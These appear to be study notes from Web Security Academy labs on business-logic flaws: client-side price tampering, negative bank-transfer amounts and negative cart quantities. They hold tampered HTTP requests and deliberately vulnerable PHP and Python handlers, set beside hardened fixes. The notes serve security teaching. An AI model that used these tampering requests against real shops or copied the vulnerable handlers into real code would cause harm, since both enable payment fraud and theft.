Price Change
Relies on the wrong assumption that users will only interact with the application through the intended interface. Any parameter the browser sends, including the price, can be edited in a proxy before it reaches the server, so the server must never take the price from the request and must always look it up server-side.
Original request (price in cents, i.e. $1337.00):
POST /cart HTTP/1.1
Host: ac5f1ff61e6cd9abc06a2436002000d5.web-security-academy.net
Content-Type: application/x-www-form-urlencoded

productId=1&redir=PRODUCT&quantity=1&price=133700
Tampered request, price set to 1 cent (the server accepts the client-supplied value):
POST /cart HTTP/1.1
Host: ac5f1ff61e6cd9abc06a2436002000d5.web-security-academy.net
Content-Type: application/x-www-form-urlencoded

productId=1&redir=PRODUCT&quantity=1&price=1
Bank Transfer
The check below only ensures the amount does not exceed the balance. Any negative amount satisfies it, so an attacker may pass in a negative value and induce unwanted behaviour: if the transfer then debits the sender and credits the recipient, a negative amount moves money in the opposite direction, from the victim to the attacker. Validate that the amount is a positive number (and not NaN or infinity) before comparing it to the balance.
$transferAmount = $_POST['amount'];    // untrusted string; PHP compares numeric strings numerically
$currentBalance = $user->getBalance();
if ($transferAmount <= $currentBalance) {
    // transfer proceeds: "-1000" <= balance is true for any balance
} else {
    // rejected: only amounts larger than the balance end up here
}
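The same check, written as an added example in Python (not code from the original notes or from any lab): the vulnerable version mirrors the PHP above, and the hardened version shows the checks a practitioner would add. Account names, balances and the amount strings are constructed sample data.

```python
from decimal import Decimal, InvalidOperation

# Constructed sample data for this example: balances keyed by account name.
def fresh_accounts():
    return {"alice": Decimal("100.00"), "bob": Decimal("50.00")}


def transfer_vulnerable(accounts, sender, recipient, amount_str):
    """Mirrors the PHP check: only verifies amount <= sender's balance.
    A negative amount passes and reverses the direction of the transfer."""
    amount = Decimal(amount_str)           # no sign or format check
    if amount <= accounts[sender]:
        accounts[sender] -= amount         # -1000 debit == +1000 credit
        accounts[recipient] += amount
        return True
    return False


def transfer_hardened(accounts, sender, recipient, amount_str):
    """Rejects anything that is not a finite, positive, cent-precision amount
    the sender can actually cover. Returns False instead of raising so the
    caller can map it to a 4xx without leaking internals."""
    try:
        amount = Decimal(amount_str)
    except InvalidOperation:               # "abc", "", "1,000" ...
        return False
    if not amount.is_finite():             # "NaN", "Infinity"
        return False
    if amount <= 0:                        # the negative-amount attack
        return False
    if amount.as_tuple().exponent < -2:    # sub-cent precision, e.g. "10.005"
        return False
    if sender == recipient or sender not in accounts or recipient not in accounts:
        return False
    if amount > accounts[sender]:          # the only check the original had
        return False
    accounts[sender] -= amount
    accounts[recipient] += amount
    return True
```

The ordering matters: the finiteness test runs before any comparison, because comparing `Decimal("NaN")` with `<=` raises rather than returning False, which is exactly the kind of surprise the vulnerable version would hit.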
Negative Quantity
Exploit against a website that doesn't reject negative quantities: add the wanted item at its real price, then add a negative quantity of a different product so that its negative line total is subtracted from the cart. Keep the overall total just above zero, since a zero or negative total is typically rejected at checkout.
First request, the item actually wanted:
POST /cart HTTP/1.1
Host: ac431f0f1f6ffc34c0a2344d00f200ea.web-security-academy.net
Content-Type: application/x-www-form-urlencoded

productId=1&redir=PRODUCT&quantity=1
Second request, a negative quantity of another product to offset the total:
POST /cart HTTP/1.1
Host: ac431f0f1f6ffc34c0a2344d00f200ea.web-security-academy.net
Content-Type: application/x-www-form-urlencoded

productId=2&redir=PRODUCT&quantity=-100
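Both cart attacks on this page, the client-supplied price and the negative quantity, come from the same missing server-side checks, so one added example covers them (this is illustrative Python, not the lab's or the notes' own code). The catalogue, its prices and the `/cart` handler functions are constructed for the example; the request bodies are the ones shown above.

```python
from urllib.parse import parse_qs

# Constructed catalogue for this example: server-side prices in cents.
# Product 1 is modelled on the 133700 seen in the request above; product 2 is hypothetical.
CATALOG = {1: 133700, 2: 1000}


def parse_form(body):
    """Parse an application/x-www-form-urlencoded POST body into a flat dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def add_to_cart_vulnerable(cart, body):
    """Vulnerable handler: trusts a client-supplied price and never checks the
    sign of the quantity. Returns the running cart total in cents."""
    form = parse_form(body)
    product_id = int(form["productId"])
    quantity = int(form["quantity"])
    # Only falls back to the catalogue when the client omits the field.
    price = int(form.get("price", CATALOG[product_id]))
    cart.append((product_id, quantity, price))
    return sum(q * p for _, q, p in cart)


def add_to_cart_hardened(cart, body):
    """Hardened handler: the price always comes from the catalogue and the
    quantity is bounded to a sane positive range. Raises ValueError on bad input."""
    form = parse_form(body)
    try:
        product_id = int(form["productId"])
        quantity = int(form["quantity"])
    except (KeyError, ValueError):
        raise ValueError("productId and quantity must be integers")
    if product_id not in CATALOG:
        raise ValueError("unknown product")
    if not 1 <= quantity <= 99:
        raise ValueError("quantity must be between 1 and 99")
    # form["price"] and form["redir"] are deliberately never read.
    cart.append((product_id, quantity, CATALOG[product_id]))
    return sum(q * p for _, q, p in cart)


def checkout_total(cart):
    """Second line of defence at checkout: recompute every line from the
    catalogue and refuse a cart with any non-positive line or total."""
    total = 0
    for product_id, quantity, _ in cart:
        if quantity < 1:
            raise ValueError("negative or zero quantity in cart")
        total += quantity * CATALOG[product_id]
    if total <= 0:
        raise ValueError("non-positive total")
    return total
```

`checkout_total` recomputes from the catalogue rather than trusting the stored line price, so even a cart that was built by the vulnerable handler is re-priced correctly at the step where money changes hands.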